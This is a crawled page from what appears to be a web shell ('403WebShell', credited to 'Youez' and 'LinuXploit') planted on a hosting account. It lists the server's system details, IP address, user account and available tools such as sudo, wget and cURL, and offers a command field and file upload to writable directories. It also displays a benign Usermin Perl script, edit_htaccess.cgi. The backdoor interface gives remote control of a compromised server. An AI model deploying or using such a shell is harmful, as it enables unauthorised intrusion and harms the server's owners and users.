Uname:Linux server2.hostofiraq.site 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64

Base Dir : /home/iscmbt-kufa-atu/public_html

User : iscmbt-kufa-atu


403WebShell
403Webshell
Server IP : 89.117.53.150  /  Your IP : 216.73.216.11
Web Server : Apache
System : Linux server2.hostofiraq.site 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
User : iscmbt-kufa-atu ( 1014)
PHP Version : 8.2.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/usermin/htaccess/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/usermin/htaccess/edit_htaccess.cgi
#!/usr/bin/perl
# edit_htaccess.cgi
# Display a form for editing some kind of per-directory options file

require './htaccess-lib.pl';
&ReadParse();
$conf = &get_htaccess_config($in{'file'});
@dirs = &editable_directives($in{'type'}, 'htaccess');
$desc = &text('htindex_header', "<tt>$in{'file'}</tt>");
&ui_print_header($desc, $text{"type_$in{'type'}"}, "");

print &ui_form_start("save_htaccess.cgi", "post");
print &ui_hidden("file", $in{'file'});
print &ui_hidden("type", $in{'type'});
print &ui_table_start(&text('htindex_header2', $text{"type_$in{'type'}"},
                            "<tt>$in{'file'}</tt>"), "width=100%", 4);
&generate_inputs(\@dirs, $conf);
print &ui_table_end();
print &ui_form_end([ [ "", $text{'save'} ] ]);

&ui_print_footer("htaccess_index.cgi?file=$in{'file'}", "options file index");



Youez - 2016 - github.com/yon3zu
LinuXploit